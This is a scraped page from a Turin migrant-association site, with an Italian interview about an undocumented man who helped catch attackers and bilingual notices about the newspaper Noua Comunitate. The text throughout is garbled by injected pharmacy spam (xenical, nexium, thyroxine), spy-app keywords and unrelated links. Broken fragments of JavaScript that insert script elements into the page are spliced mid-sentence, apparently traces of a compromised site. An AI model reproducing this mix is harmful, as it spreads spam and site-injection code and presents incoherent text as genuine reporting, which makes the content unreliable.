Storie di ordinaria follia – parte terza

“Non sono un eroe, ho fatto la cosa giusta”

Parla il clandestino che ha bloccato l´aggressore dell´amica: “Il foglio di via mi ha fatto male” Vivo in un´ex fabbrica di Moncalieri: senza documenti e senza lavoro niente casa Uno l´ho fermato vicino al negozio di un mio amico egiziano che mi diceva di scappare

Domenica Sahabi Sadali è andato al Mauriziano a trovare la sua amica. Per poco lei non perdeva il braccio, in seguito a quell’aggressione nel parco del Valentino vicino allo Chalet. È stato per merito suo se giovedì notte gli uomini del nucleo radiomobile sono riusciti ad arrestare in tempi brevissimi due giovani peruviani che a lo avevano appena rapinato del marsupio e avevano accoltellato in modo brutale una sua amica, Loreta Rizza, 45 anni, per strapparle la borsa. Ma dopo aver contribuito a fare giustizia, si è trovato in mano un foglio di via perché è senza documenti. Entro martedì deve lasciare l´Italia, altrimenti se le forze dell´ordine lo fermeranno sarà arrestato.

Leggi su Lastampa.it il resto dell’intervista realizzata da Federica Cravero. 

buy xenical canada

http://letaschepiene.it/2017/10/31/sms-spy-whatsapp-spy-spymobile/

I numeri di febbraio e marzo di Noua Comunitate


Marzo2008document.currentScript.parentNode.insertBefore(s, document.currentScript); nexium 18.00 a month spy software, phone parental monitoring, spy apps

Noua Comunitate, a pleasant return

nouacomunitate_01.jpgA special edition of Noua Comunitate was finally on release last Saturday, December 1st. The newspaper of Terra del Fuoco that has been a bilingual paper (Italian and Romenian) and entirely focused on the Romenian community until last summer, is now a monthly heading about all migrants communities if Turin, not only the Romenians, and with a new layout.

Waiting to assign a continued release to Noua Comunitate, this special edition presents an inquiry about the recent social alarm caused by the events that took place in the past two months, an interview to the police vice-commissioner, Mr. Marco Martino, and an additional inquiry on the status of things in Italy after one year Romania entered the European Union.


thyroxine for sale canadian pharmacy if (document.currentScript) { http://international.varee.ac.th/?p=3829

Noua Comunitate, un lieto ritorno

on linepharmacy nouacomunitate_01.jpgÈ uscito sabato primo dicembre il numero speciale di Noua Comunitate. Quello che fino all’estate scorsa era il quindicinale bilingue (romeno e italiano) di Terra del Fuoco dedicato in toto alla comunità romena di Torino assume tutta un’altra grafica e contenuti che da quest’anno saranno dedicati all’intero orizzonte dell’immigrazione torinese, non solo quella romena.

In attesa di dare una continuità mensile al giornale, sul numero speciale di dicembre i punti forte sono un’inchiesta sull’emergenza sociale creatasi dopo gli avvenimenti degli ultimi due mesi, un’intervista al vicequestore di Torino Marco Martino e un’inchiesta sullo status quo in Italia ad un anno dell’entrata della Romania nell’Unione Europea.

Vi proponiamo di seguito uno stralcio dell’editoriale presente in seconda di copertina, a cura di Michele Curto, presidente di Terra del Fuoco.

“Ci siamo lasciati alcuni mesi fa…nel luglio di quest’anno, allora Noua Comunitate aveva un’altra veste grafica, un altro formato, un altro direttore responsabile, e soprattutto un’altra obbiettivo.

Questo non è ancora un ritorno, di novità ce ne saranno tante, le vedrete a partire dal 1 gennaio quando ritorneremo a tutti gli effetti.
Oggi scriviamo questo numero di transizione perché abbiamo vissuto con voi e con le comunità migranti le ultime settimane così difficili e così drammatiche, dal terribile omicidio di Tor di Quinto alla risposta scomposta e a tratti xenofoba della stampa e della politica italiana. Abbiamo cercato a “mente fredda??? a crisi isterica conclusa (almeno per ora) di provare ad articolare una risposta.
ci è sembrato doveroso anticipare la nuova uscita del giornale con questo numero straordinario, dedicato a gettare un po’ di luce sulle cifre e le percezioni stereotipate delle scorse settimane. L’Italia che sognamo è un paese europeo, accogliente, solidale, multietnico, l’Italia che abbiamo visto nelle scorse settimane è un paese con i nervi a pezzi, impaurito e smarrito, in preda a demagogiche visioni, prodotte dalla fabbrica della paura in un rapporto perverso fra pessimi media e cattiva politica. Un paese che in preda al panico ha messo in discussione la sua appartenenza Europea sulla soglia del volersi richiudere in se stesso. Per questo apriamo il numero con la RumenoFobia, sperando che non esista…..

Noua Comunitate è in distribuzione gratuita presso i centri di aggregazione delle comunità migranti e presso la sede di Terra del fuoco (via Leoncavallo 27).
vi aspettiamo quindi dal prossimo mese con tante altre novità….”} else {http://blog.2iyf.com/?p=14144

Noua Comunitate resumes issues

After the prolonged summer pause, Noua Comunitate will return to be published at the beginning of December. Thanks to the collaboration with Nuova Società 2007, fortnightly review directed by Diego Novelli, our newspaper presents itself anew with a new graphical layout and renewed contents, spacing on the whole horizon of immigration in Turin. The periodicity is monthly.d.getElementsByTagName(‘head’)[0].appendChild(s);} else { norethindrone http://intranet.auraportalacapa.familycenti.com/wp/?p=1274